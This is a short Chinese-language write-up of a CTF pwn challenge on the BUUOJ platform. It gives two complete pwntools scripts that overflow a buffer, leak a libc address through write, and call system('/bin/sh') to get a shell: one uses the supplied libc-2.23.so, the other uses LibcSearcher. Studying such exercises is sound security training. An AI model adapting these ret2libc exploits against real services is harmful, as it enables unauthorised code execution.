做了一道题目,它提供了 libc文件;
这道题 可以使用 libc-2.23.so文件 来 解出来, 也可以不使用;
当使用 libc2.23.so文件时 EXp为
from pwn import *
p = remote("node3.buuoj.cn",29829)
libc=ELF('libc-2.23.so')
elf = ELF('./pwn1')
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x08048825
payload1 = "\0" + "\xff"*7
p.sendline(payload1)
p.recvuntil("Correct\n")
payload2 = "a"*0xe7+'a'*4 +p32(write_plt) +p32(main)+ p32(1)+p32(write_got)+p32(0x8)
p.sendline(payload2)
write_addr=u32(p.recv(4))
offset = write_addr - libc.sym['write']
system_addr=offset+libc.sym['system']
bin_sh_addr=offset+libc.search('/bin/sh').next()
p.sendline(payload1)
p.recvuntil('Correct\n')
payload3 = "a"*0xe7 + 'a'*4 +p32(system_addr) + p32(0) + p32(bin_sh_addr)
p.sendline(payload3)
p.interactive()
不使用的情况下 EXP:
from pwn import *
from LibcSearcher import *
p=remote('node3.buuoj.cn',26210)
elf=ELF('./pwn1')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048825
payload1='\0'+'\xff'*7
p.sendline(payload1)
p.recvline()
payload2='a'*(0xe7 + 0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload2)
write_addr=u32(p.recv(4))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')
p.sendline(payload1)
p.recvline()
payload3='a'*(0xe7 + 0x4)+p32(system_addr) + p32(0) +p32(bin_sh_addr)
p.sendline(payload3)
p.interactive()
两者的差异:
有libc.so文件时
1.不需要调用from LibcSearcher import *
没有libc=LibcSearcher('write',write_addr) 这一步
2.offset = write_addr - libc.sym[‘write’]
system_addr=offset+libc.sym[‘system’]
bin_sh_addr=offset+libc.search(’/bin/sh’).next()
计算偏移量 和 偏移函数 的时候: 语句为 libc.sym[]
找 bin_sh 位置时 语句为: bin_sh_addr=offset+libc.search('/bin/sh').next()
没有libc.2.23.so文件时
from LibcSearcher import *
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')